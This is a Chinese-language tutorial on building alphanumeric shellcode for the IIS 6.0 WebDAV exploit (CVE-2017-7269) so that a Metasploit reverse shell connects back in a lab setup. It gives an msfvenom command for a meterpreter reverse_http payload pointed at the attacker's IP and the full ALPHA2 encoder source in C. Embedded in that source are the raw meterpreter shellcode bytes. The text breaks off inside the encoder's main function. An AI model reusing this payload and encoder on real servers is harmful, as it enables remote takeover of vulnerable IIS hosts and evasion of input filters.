針對IIS6.0 WebDAV漏洞(cve-2017-7269)製作純字符數字的shellcode回連msf

環境:

Kali攻擊機1 IP:192.168.114.140

Win7攻擊機2 IP(安裝gcc和python2.7):192.168.114.130

Windows server 2003目標主機(開啓webdev服務):192.168.114.132

 

在攻擊機1中的操作:

使用msfvenom生成shellcode :

msfvenom -pwindows/meterpreter/reverse_http lhost=192.168.114.140 lport=5555 -f c


在攻擊機2中的操作:

創建一個文本文件,將以下代碼拷貝進去,並修改成.c後綴名的任意命名文件(代碼參照:https://bbs.ichunqiu.com/thread-21294-1-1.html 由於encode.c編譯有誤,下面是經過我修改和翻譯後的encode.c,這個Alpha2是Linux下的源碼源Appha2地址是:http://skypher.com/wiki/index.php/ALPHA2):

// Alpha2.cpp : Defines the entry point for the console application.
//

#include <ctype.h> // tolower()
#include <stdio.h> // printf(), fprintf(), stderr
#include <stdlib.h> // exit(), EXIT_SUCCESS, EXIT_FAILURE, srand(), rand()
#include <string.h> // strcasecmp(), strstr()
#include <time.h> //struct timeval, struct timezone, gettimeofday()
#include <winsock.h>
#define VERSION_STRING "ALPHA 2: Zero-tolerance. (build 07)"
#define COPYRIGHT      "Copyright (C) 2003, 2004 by Berend-Jan Wever."
/*
________________________________________________________________________________

    ,sSSs,,s,  ,sSSSs,  ALPHA 2: Zero-tolerance.
   SS"  Y$P"  SY"  ,SY
  iS'   dY       ,sS"   Unicode-proof uppercase alphanumeric shellcode encoding.
  YS,  dSb    ,sY"      Copyright (C) 2003, 2004 by Berend-Jan Wever.
  '"YSS'"S' 'SSSSSSSP   <[email protected]>
________________________________________________________________________________

  This program is free software; you can redistribute it and/or modify it under
  the terms of the GNU General Public License version 2, 1991 as published by
  the Free Software Foundation.

  This program is distributed in the hope that it will be useful, but WITHOUT
  ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
  FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
  details.

  A copy of the GNU General Public License can be found at:
    http://www.gnu.org/licenses/gpl.html
  or you can write to:
    Free Software Foundation, Inc.
    59 Temple Place - Suite 330
    Boston, MA  02111-1307
    USA.

Acknowledgements:
  Thanks to rix for his phrack article on aphanumeric shellcode.
  Thanks to obscou for his phrack article on unicode-proof shellcode.
  Thanks to Costin Ionescu for the idea behind w32 SEH GetPC code.
*/

#define mixedcase_w32sehgetpc           "VTX630VXH49HHHPhYAAQhZYYYYAAQQDDDd36FFFFTXVj0PPTUPPa301089"
#define uppercase_w32sehgetpc           "VTX630WTX638VXH49HHHPVX5AAQQPVX5YYYYP5YYYD5KKYAPTTX638TDDNVDDX4Z4A63861816"
#define mixedcase_ascii_decoder_body    "jAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"
#define uppercase_ascii_decoder_body    "VTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJI"
#define mixedcase_unicode_decoder_body  "jXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JB"
#define uppercase_unicode_decoder_body  "QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB"

/*
 * Decoder lookup tables.
 *
 * `id` is the BASEADDRESS option name that main() compares (case-insensitively)
 * against its command-line argument; `code` is the alphanumeric text that
 * main() prints to stdout immediately before the encoded payload. Every table
 * is terminated by a { NULL, NULL } sentinel, which main() relies on when it
 * walks a table. There is one table per combination of --uppercase, --unicode
 * and --nocompress; main() picks the table through the decoders[] index array
 * declared below, so the table order there must stay in step with the option
 * formula used in main(). The strings themselves are opaque data to this file:
 * nothing here parses or modifies them.
 */
struct decoder {
  char* id; // BASEADDRESS option name matched against argv (e.g. "esp", "[esp+4]", "seh")
  char* code; // decoder text emitted verbatim ahead of the encoded bytes
} mixedcase_ascii_decoders[] = { // no option flags
  { "nops",     "IIIIIIIIIIIIIIIIII7" mixedcase_ascii_decoder_body },
  { "eax",      "PYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
  { "ecx",      "IIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
  { "edx",      "JJJJJJJJJJJJJJJJJ7RY" mixedcase_ascii_decoder_body },
  { "ebx",      "SYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
  { "esp",      "TYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
  { "ebp",      "UYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
  { "esi",      "VYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
  { "edi",      "WYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
  { "[esp-10]", "LLLLLLLLLLLLLLLLYIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
  { "[esp-C]",  "LLLLLLLLLLLLYIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
  { "[esp-8]",  "LLLLLLLLYIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
  { "[esp-4]",  "LLLL7YIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
  { "[esp]",    "YIIIIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
  { "[esp+4]",  "YYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
  { "[esp+8]",  "YYYIIIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
  { "[esp+C]",  "YYYYIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
  { "[esp+10]", "YYYYYIIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
  { "[esp+14]", "YYYYYYIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
  { "[esp+18]", "YYYYYYYIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
  { "[esp+1C]", "YYYYYYYYIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
  { "seh",      mixedcase_w32sehgetpc "IIIIIIIIIIIIIIIII7QZ" // ecx code
                mixedcase_ascii_decoder_body },
  { NULL, NULL } // sentinel; main() stops walking the table here
}, uppercase_ascii_decoders[] = { // --uppercase
  { "nops",     "IIIIIIIIIIII" uppercase_ascii_decoder_body },
  { "eax",      "PYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
  { "ecx",      "IIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
  { "edx",      "JJJJJJJJJJJRY" uppercase_ascii_decoder_body },
  { "ebx",      "SYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
  { "esp",      "TYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
  { "ebp",      "UYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
  { "esi",      "VYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
  { "edi",      "WYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
  { "[esp-10]", "LLLLLLLLLLLLLLLLYII7QZ" uppercase_ascii_decoder_body },
  { "[esp-C]",  "LLLLLLLLLLLLYIIII7QZ" uppercase_ascii_decoder_body },
  { "[esp-8]",  "LLLLLLLLYIIIIII7QZ" uppercase_ascii_decoder_body },
  { "[esp-4]",  "LLLL7YIIIIIIIIQZ" uppercase_ascii_decoder_body },
  { "[esp]",    "YIIIIIIIIII7QZ" uppercase_ascii_decoder_body },
  { "[esp+4]",  "YYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
  { "[esp+8]",  "YYYIIIIIIIII7QZ" uppercase_ascii_decoder_body },
  { "[esp+C]",  "YYYYIIIIIIIIIQZ" uppercase_ascii_decoder_body },
  { "[esp+10]", "YYYYYIIIIIIII7QZ" uppercase_ascii_decoder_body },
  { "[esp+14]", "YYYYYYIIIIIIIIQZ" uppercase_ascii_decoder_body },
  { "[esp+18]", "YYYYYYYIIIIIII7QZ" uppercase_ascii_decoder_body },
  { "[esp+1C]", "YYYYYYYYIIIIIIIQZ" uppercase_ascii_decoder_body },
  { "seh",      uppercase_w32sehgetpc "IIIIIIIIIIIQZ" // ecx code
                uppercase_ascii_decoder_body },
  { NULL, NULL }
}, mixedcase_ascii_nocompress_decoders[] = { // --nocompress
  { "nops",     "7777777777777777777777777777777777777" mixedcase_ascii_decoder_body },
  { "eax",      "PY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
  { "ecx",      "77777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
  { "edx",      "77777777777777777777777777777777777RY" mixedcase_ascii_decoder_body },
  { "ebx",      "SY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
  { "esp",      "TY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
  { "ebp",      "UY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
  { "esi",      "VY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
  { "edi",      "WY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
  { "[esp-10]", "LLLLLLLLLLLLLLLLY777777777777777777QZ" mixedcase_ascii_decoder_body },
  { "[esp-C]",  "LLLLLLLLLLLLY7777777777777777777777QZ" mixedcase_ascii_decoder_body },
  { "[esp-8]",  "LLLLLLLLY77777777777777777777777777QZ" mixedcase_ascii_decoder_body },
  { "[esp-4]",  "LLLL7Y77777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
  { "[esp]",    "Y7777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
  { "[esp+4]",  "YY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
  { "[esp+8]",  "YYY77777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
  { "[esp+C]",  "YYYY7777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
  { "[esp+10]", "YYYYY777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
  { "[esp+14]", "YYYYYY77777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
  { "[esp+18]", "YYYYYYY7777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
  { "[esp+1C]", "YYYYYYYY777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
  { "seh",      mixedcase_w32sehgetpc "77777777777777777777777777777777777QZ" // ecx code
                mixedcase_ascii_decoder_body },
  { NULL, NULL }
}, uppercase_ascii_nocompress_decoders[] = { // --uppercase --nocompress
  { "nops",     "777777777777777777777777" uppercase_ascii_decoder_body },
  { "eax",      "PY77777777777777777777QZ" uppercase_ascii_decoder_body },
  { "ecx",      "7777777777777777777777QZ" uppercase_ascii_decoder_body },
  { "edx",      "7777777777777777777777RY" uppercase_ascii_decoder_body },
  { "ebx",      "SY77777777777777777777QZ" uppercase_ascii_decoder_body },
  { "esp",      "TY77777777777777777777QZ" uppercase_ascii_decoder_body },
  { "ebp",      "UY77777777777777777777QZ" uppercase_ascii_decoder_body },
  { "esi",      "VY77777777777777777777QZ" uppercase_ascii_decoder_body },
  { "edi",      "WY77777777777777777777QZ" uppercase_ascii_decoder_body },
  { "[esp-10]", "LLLLLLLLLLLLLLLLY77777QZ" uppercase_ascii_decoder_body },
  { "[esp-C]",  "LLLLLLLLLLLLY777777777QZ" uppercase_ascii_decoder_body },
  { "[esp-8]",  "LLLLLLLLY7777777777777QZ" uppercase_ascii_decoder_body },
  { "[esp-4]",  "LLLL7Y7777777777777777QZ" uppercase_ascii_decoder_body },
  { "[esp]",    "Y777777777777777777777QZ" uppercase_ascii_decoder_body },
  { "[esp+4]",  "YY77777777777777777777QZ" uppercase_ascii_decoder_body },
  { "[esp+8]",  "YYY7777777777777777777QZ" uppercase_ascii_decoder_body },
  { "[esp+C]",  "YYYY777777777777777777QZ" uppercase_ascii_decoder_body },
  { "[esp+10]", "YYYYY77777777777777777QZ" uppercase_ascii_decoder_body },
  { "[esp+14]", "YYYYYY7777777777777777QZ" uppercase_ascii_decoder_body },
  { "[esp+18]", "YYYYYYY777777777777777QZ" uppercase_ascii_decoder_body },
  { "[esp+1C]", "YYYYYYYY77777777777777QZ" uppercase_ascii_decoder_body },
  { "seh",      uppercase_w32sehgetpc "7777777777777777777777QZ" // ecx code
                uppercase_ascii_decoder_body },
  { NULL, NULL }
}, mixedcase_unicode_decoders[] = { // --unicode (fewer ids: no [esp-X]/[esp+8..] or seh entries)
  { "nops",     "IAIAIAIAIAIAIAIAIAIAIAIAIAIA4444" mixedcase_unicode_decoder_body },
  { "eax",      "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
  { "ecx",      "IAIAIAIAIAIAIAIAIAIAIAIAIAIA4444" mixedcase_unicode_decoder_body },
  { "edx",      "RRYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
  { "ebx",      "SSYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
  { "esp",      "TUYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
  { "ebp",      "UUYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
  { "esi",      "VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
  { "edi",      "WWYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
  { "[esp]",    "YAIAIAIAIAIAIAIAIAIAIAIAIAIAIA44" mixedcase_unicode_decoder_body },
  { "[esp+4]",  "YUYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
  { NULL, NULL }
}, uppercase_unicode_decoders[] = { // --uppercase --unicode
  { "nops",     "IAIAIAIA4444" uppercase_unicode_decoder_body },
  { "eax",      "PPYAIAIAIAIA" uppercase_unicode_decoder_body },
  { "ecx",      "IAIAIAIA4444" uppercase_unicode_decoder_body },
  { "edx",      "RRYAIAIAIAIA" uppercase_unicode_decoder_body },
  { "ebx",      "SSYAIAIAIAIA" uppercase_unicode_decoder_body },
  { "esp",      "TUYAIAIAIAIA" uppercase_unicode_decoder_body },
  { "ebp",      "UUYAIAIAIAIA" uppercase_unicode_decoder_body },
  { "esi",      "VVYAIAIAIAIA" uppercase_unicode_decoder_body },
  { "edi",      "WWYAIAIAIAIA" uppercase_unicode_decoder_body },
  { "[esp]",    "YAIAIAIAIA44" uppercase_unicode_decoder_body },
  { "[esp+4]",  "YUYAIAIAIAIA" uppercase_unicode_decoder_body },
  { NULL, NULL }
}, mixedcase_unicode_nocompress_decoders[] = { // --unicode --nocompress
  { "nops",     "444444444444444444444444444444444444444" mixedcase_unicode_decoder_body },
  { "eax",      "PPYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
  { "ecx",      "444444444444444444444444444444444444444" mixedcase_unicode_decoder_body },
  { "edx",      "RRYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
  { "ebx",      "SSYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
  { "esp",      "TUYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
  { "ebp",      "UUYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
  { "esi",      "VVYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
  { "edi",      "WWYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
  { "[esp]",    "YA4444444444444444444444444444444444444" mixedcase_unicode_decoder_body },
  { "[esp+4]",  "YUYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
  { NULL, NULL }
}, uppercase_unicode_nocompress_decoders[] = { // --uppercase --unicode --nocompress
  { "nops",     "44444444444444" uppercase_unicode_decoder_body },
  { "eax",      "PPYA4444444444" uppercase_unicode_decoder_body },
  { "ecx",      "44444444444444" uppercase_unicode_decoder_body },
  { "edx",      "RRYA4444444444" uppercase_unicode_decoder_body },
  { "ebx",      "SSYA4444444444" uppercase_unicode_decoder_body },
  { "esp",      "TUYA4444444444" uppercase_unicode_decoder_body },
  { "ebp",      "UUYA4444444444" uppercase_unicode_decoder_body },
  { "esi",      "VVYA4444444444" uppercase_unicode_decoder_body },
  { "edi",      "WWYA4444444444" uppercase_unicode_decoder_body },
  { "[esp]",    "YA444444444444" uppercase_unicode_decoder_body },
  { "[esp+4]",  "YUYA4444444444" uppercase_unicode_decoder_body },
  { NULL, NULL }
};

/*
 * Index array over the eight decoder tables. main() computes
 *   options = uppercase + unicode*2 + nocompress*4
 * and uses decoders[options], so the position of each table here encodes the
 * option combination: bit 0 = --uppercase, bit 1 = --unicode,
 * bit 2 = --nocompress. Do not reorder these entries without changing that
 * formula.
 */
struct decoder* decoders[] = {
  mixedcase_ascii_decoders, uppercase_ascii_decoders,                       // 0, 1
  mixedcase_unicode_decoders, uppercase_unicode_decoders,                   // 2, 3
  mixedcase_ascii_nocompress_decoders, uppercase_ascii_nocompress_decoders, // 4, 5
  mixedcase_unicode_nocompress_decoders, uppercase_unicode_nocompress_decoders // 6, 7
};
// evil: the raw input bytes that main() encodes. This page's author pasted
// the output of the msfvenom command shown above into this array; anyone
// reusing the encoder replaces this array with their own input.
// The array is only read, byte by byte, by the encoding loop in main();
// nothing else in this file interprets or executes it. Because it is written
// as a string literal, sizeof(evil) is one larger than the number of bytes
// pasted (the implicit '\0' terminator) — note that the embedded "\x00"
// bytes mean the contents cannot be treated as a C string.
char evil[] =  
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c"
"\x77\x26\x07\xff\xd5\x31\xdb\x53\x53\x53\x53\x53\x68\x3a\x56"
"\x79\xa7\xff\xd5\x53\x53\x6a\x03\x53\x53\x68\xb3\x15\x00\x00"
"\xe8\x75\x01\x00\x00\x2f\x37\x49\x69\x45\x65\x57\x69\x66\x79"
"\x4f\x59\x71\x7a\x69\x76\x50\x63\x38\x64\x66\x41\x67\x50\x79"
"\x33\x6e\x54\x49\x71\x4b\x42\x44\x46\x37\x2d\x4d\x53\x66\x5a"
"\x71\x57\x4c\x57\x4b\x58\x70\x6d\x4c\x56\x75\x6b\x50\x6e\x34"
"\x5f\x4f\x4f\x69\x31\x4b\x6d\x59\x6c\x5f\x57\x6b\x61\x36\x59"
"\x78\x41\x46\x5a\x76\x6c\x58\x6b\x63\x50\x6f\x53\x53\x57\x71"
"\x5f\x58\x48\x77\x41\x4c\x69\x30\x57\x65\x41\x78\x64\x45\x59"
"\x64\x77\x76\x31\x64\x32\x67\x58\x34\x7a\x50\x56\x39\x63\x71"
"\x37\x6d\x39\x50\x36\x74\x5a\x77\x39\x32\x36\x57\x30\x53\x58"
"\x49\x66\x44\x59\x58\x57\x49\x74\x4d\x4f\x47\x36\x6c\x5a\x51"
"\x65\x38\x44\x69\x7a\x34\x75\x37\x6c\x4d\x4c\x4e\x44\x5a\x6b"
"\x74\x47\x42\x72\x4d\x76\x38\x4f\x64\x58\x64\x46\x32\x50\x70"
"\x7a\x4d\x46\x75\x74\x35\x43\x32\x33\x63\x50\x33\x6a\x46\x62"
"\x4e\x4e\x79\x4b\x38\x72\x31\x79\x4d\x4b\x56\x51\x63\x70\x67"
"\x63\x34\x57\x73\x68\x4f\x57\x65\x4a\x38\x55\x31\x71\x36\x73"
"\x68\x2d\x33\x43\x53\x4d\x6f\x79\x67\x70\x55\x52\x57\x2d\x4c"
"\x56\x68\x73\x70\x4a\x62\x2d\x35\x6a\x4f\x2d\x41\x45\x4d\x00"
"\x50\x68\x57\x89\x9f\xc6\xff\xd5\x89\xc6\x53\x68\x00\x02\x60"
"\x84\x53\x53\x53\x57\x53\x56\x68\xeb\x55\x2e\x3b\xff\xd5\x96"
"\x6a\x0a\x5f\x53\x53\x53\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5"
"\x85\xc0\x75\x14\x68\x88\x13\x00\x00\x68\x44\xf0\x35\xe0\xff"
"\xd5\x4f\x75\xe1\xe8\x4c\x00\x00\x00\x6a\x40\x68\x00\x10\x00"
"\x00\x68\x00\x00\x40\x00\x53\x68\x58\xa4\x53\xe5\xff\xd5\x93"
"\x53\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96"
"\x89\xe2\xff\xd5\x85\xc0\x74\xcf\x8b\x07\x01\xc3\x85\xc0\x75"
"\xe5\x58\xc3\x5f\xe8\x7f\xff\xff\xff\x31\x39\x32\x2e\x31\x36"
"\x38\x2e\x31\x31\x34\x2e\x31\x34\x30\x00\xbb\xf0\xb5\xa2\x56"
"\x6a\x00\x53\xff\xd5";


/*
 * Print the ALPHA 2 banner (program name, VERSION_STRING and COPYRIGHT) to
 * stdout and terminate the process with EXIT_SUCCESS. Never returns.
 * None of the banner lines contain a '%', so writing them with fputs()
 * produces exactly the same bytes as the original printf() call.
 */
void version(void) {
  static const char rule[] =
    "________________________________________________________________________________\n";

  fputs(rule, stdout);
  fputs("\n", stdout);
  fputs("    ,sSSs,,s,  ,sSSSs,  " VERSION_STRING "\n", stdout);
  fputs("   SS/'  Y$P/' SY/' ,SY \n", stdout);
  fputs("  iS'   dY       ,sS/'   Unicode-proof uppercase alphanumeric shellcode encoding.\n", stdout);
  fputs("  YS,  dSb    ,sY/'      " COPYRIGHT "\n", stdout);
  fputs("  '/'YSS'/'S' 'SSSSSSSP   <[email protected]>\n", stdout);
  fputs(rule, stdout);
  fputs("\n", stdout);

  exit(EXIT_SUCCESS);
}

/*
 * Print the usage text to stdout and terminate with EXIT_SUCCESS. Never
 * returns.
 *
 * name: argv[0] of the running program; it is the only format argument and
 *       is substituted into the "使用方法" (usage) line via "%s".
 *
 * The text is one printf() format string, which is why the literal "100 %%"
 * below is written with a doubled percent sign. Note that main() also accepts
 * a "--spaces" flag that is not listed here.
 */
void help(char* name) 
{
  printf(
	"\n"
    "  使用方法: %s [OPTION] [BASEADDRESS]\n"
	"\n"
    "  ALPHA 2編碼您的IA-32 shellcode僅包含字母數字字符,結果可以是隻有大寫字母和寫字母和(或)unicode的證明,它是您的原始shellcode的編碼版本,由一些填充的baseaddress代碼組成,解碼器程序和編碼的原始shellcode,這將適用於任何目標操作系統,所得到的shellcode需要具有RWE訪問權限,以修改自己的代碼並解碼存儲器中的原始shellcode.\n"
    "\n"
    "BASEADDRESS\n"
    "  解碼器常需要在指定的寄存器中具有基地址.baseaddress代碼將baseaddress從給定的寄存器或堆棧位置複製到適當的寄存器中.\n"
    "eax, ecx, edx, ecx, esp, ebp, esi, edi\n"
    "  從給定的寄存器中取出baseaddress.(使用esp的Unicode baseaddress代碼將覆蓋由ebp指向的內存的字節!)\n"
    "[esp], [esp-X], [esp+X]\n"   
    "  從堆棧中取出baseaddress\n"
    "seh\n"
    "  Windows的結構化異常處理程序(seh)可以用於在win32系統上自動計算baseaddress.此選項不適用於unicode-proof shellcode,大寫版本不是100 %%可靠.\n"
    "nops\n"
    "  沒有baseaddress代碼,只是填充. 如果您需要從源代碼中獲取baseaddress,請使用此選項(結合--nocompress),並使用自己的代碼替換nops. ascii解碼器需要在寄存器ecx和edx中的基地址,僅在ecx中的unicode-proof解碼器.\n"
	"\n"
    "-n\n"
    "  不輸出一個換行後的shellcode.\n"
    "--nocompress\n"
    "  baseaddress代碼使用'dec'指令來降低所需的填充長度. 因此,unicode-proof代碼會覆蓋shellcode前面的一些字節. 如果不想使用'dec',請使用此選項.\n"
    "--unicode\n"
    "  把shellcode unicode-proof.這意味着當它被轉換爲Unicode(在每一個字節中插入一個'0')才被執行.\n"
    "--uppercase\n"
    "  將shellcode全部轉換成大寫字符,使用更多的字節然後混合shellcode\n"
    "--sources\n"
    "  爲給定的組合--uppercase和--unicode輸出一串基地址(BASEADDRESS)選項\n"
    "--help\n"
    "  顯示幫助和退出\n"
    "--version\n"
    "  輸出版本信息和退出\n"
    "\n"
    "  請查看源文件獲取更多細節和複製條件,該軟件不受保護,不用作商業及特定用途\n"
    "\n"
    "致謝:\n"
    "  Thanks to rix for his phrack article on aphanumeric shellcode.\n"
    "  Thanks to obscou for his phrack article on unicode-proof shellcode.\n"
    "  Thanks to Costin Ionescu for the idea behind w32 SEH GetPC code.\n"
    "\n"
    "  報告bugs:<[email protected]>\n",
    name
  );
  exit(EXIT_SUCCESS);
}

//-----------------------------------------------------------------------------
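/*
 * Case-insensitive equality test for two NUL-terminated strings.
 * The original code called stricmp(), which is an MSVC/MinGW name and does
 * not exist on POSIX toolchains (the page notes the file failed to build with
 * the Kali gcc). This helper is plain C and gives the same answer for the
 * ASCII option names in the decoder tables.
 * Returns 1 when the strings are equal ignoring case, 0 otherwise.
 */
static int str_ieq(const char *a, const char *b)
{
  for (; *a != '\0' && *b != '\0'; a++, b++) {
    if (tolower((unsigned char)*a) != tolower((unsigned char)*b)) {
      return 0;
    }
  }
  return *a == *b;
}

/*
 * Return a character of valid_chars (len > 0 entries) whose low nibble equals
 * `nibble`, or -1 if the alphabet has none.
 * The search starts at a rand()-chosen position and walks the alphabet
 * cyclically, so which of several candidates is returned depends on the PRNG
 * state; the walk is bounded by len, so it always terminates. This replaces
 * the original `i = ++i % strlen(valid_chars)` step, which modified `i` twice
 * without a sequence point (undefined behaviour, CERT EXP30-C).
 */
static int pick_char(const char *valid_chars, size_t len, int nibble)
{
  size_t start = (size_t)rand() % len;
  for (size_t step = 0; step < len; step++) {
    int c = (unsigned char)valid_chars[(start + step) % len];
    if ((c & 0x0f) == nibble) {
      return c;
    }
  }
  return -1;
}

/*
 * Entry point. Parses the command line, selects one decoder entry from the
 * decoders[] tables, prints its `code`, then prints every byte of evil[]
 * encoded as two characters from the chosen alphabet, followed by a
 * terminating "A" (which is why 'A' is absent from the alphabets below).
 *
 * argv[1..]: flags --help, --version, --uppercase, --unicode, --nocompress,
 *            --sources, --spaces (undocumented in help()), -n, and exactly one
 *            BASEADDRESS word, matched case-insensitively against the table
 *            ids. argv values are only compared or passed as "%s" arguments,
 *            never used as format strings.
 * envp:      unused; kept so the signature of the original is unchanged.
 * Exit status: EXIT_FAILURE on a usage error, EXIT_SUCCESS otherwise.
 *
 * Encoding of one input byte with nibbles A (high) and B (low):
 *   F = B; E = high nibble of some alphabet char whose low nibble is F;
 *   D = unicode ? (A - E) & 0xf : A ^ E;
 *   C = high nibble of some alphabet char whose low nibble is D;
 * output is the two chars CD and EF.
 */
int main(int argc, char* argv[], char* envp[]) 
{
  int   uppercase = 0, unicode = 0, sources = 0,
        nonewline = 0, nocompress = 0, options = 0, spaces = 0;
  char* baseaddress = NULL;
  const char* valid_chars;
  size_t alphabet_len;
  int   i;

  (void)envp;
  // No srand() call is made in this file (the seeding code that was here is
  // commented out), so rand() starts from the library default and the encoded
  // output is identical on every run.

  // Scan all the options and set internal variables accordingly
  for (i = 1; i < argc; i++) 
  {
         if (strcmp(argv[i], "--help") == 0) help(argv[0]);
    else if (strcmp(argv[i], "--version") == 0) version();
    else if (strcmp(argv[i], "--uppercase") == 0) uppercase = 1;
    else if (strcmp(argv[i], "--unicode") == 0) unicode = 1;
    else if (strcmp(argv[i], "--nocompress") == 0) nocompress = 1;
    else if (strcmp(argv[i], "--sources") == 0) sources = 1;
    else if (strcmp(argv[i], "--spaces") == 0) spaces = 1;
    else if (strcmp(argv[i], "-n") == 0) nonewline = 1;
    else if (baseaddress == NULL) baseaddress = argv[i];
    else 
    {
      fprintf(stderr, "%s: 不止一個BASEADDRESS option: '%s' 和 '%s'\n"
                      "使用 '%s --help' 獲取更多信息.\n",
                      argv[0], baseaddress, argv[i], argv[0]);
      exit(EXIT_FAILURE);
    }
  }

  // No baseaddress option ?
  if (baseaddress == NULL) 
  {
    fprintf(stderr, "%s: 缺少 BASEADDRESS 選項.\n"
                    "使用 '%s --help' 獲取更多信息.\n", argv[0], argv[0]);
    exit(EXIT_FAILURE);
  }

  // The uppercase, unicode and nocompress options select one of the eight
  // decoder tables; decoders[] is laid out so that this bit-packed value is
  // the table's index (bit 0 uppercase, bit 1 unicode, bit 2 nocompress).
  options = uppercase + unicode * 2 + nocompress * 4;

  // --sources: list the BASEADDRESS ids the selected table offers and exit.
  if (sources) 
  {
    printf("可用的選項 %s%s 包括文字數字的shellcode:\n",
           uppercase ? "uppercase" : "mixedcase",
           unicode ? " unicode-proof" : "");
    for (i = 0; decoders[options][i].id != NULL; i++) 
    {
      printf("  %s\n", decoders[options][i].id);
    }
    printf("\n");
    exit(EXIT_SUCCESS);
  }

  // Output alphabet. Digits cover low nibbles 0-9 (0x30-0x39) and "B".."O"
  // cover 2-15 (0x42-0x4F), so every nibble value has at least one candidate
  // in either alphabet. 'A' is reserved as the end-of-data marker printed last.
  if (uppercase) 
  {
    valid_chars = spaces ? " 0123456789BCDEFGHIJKLMNOPQRSTUVWXYZ"
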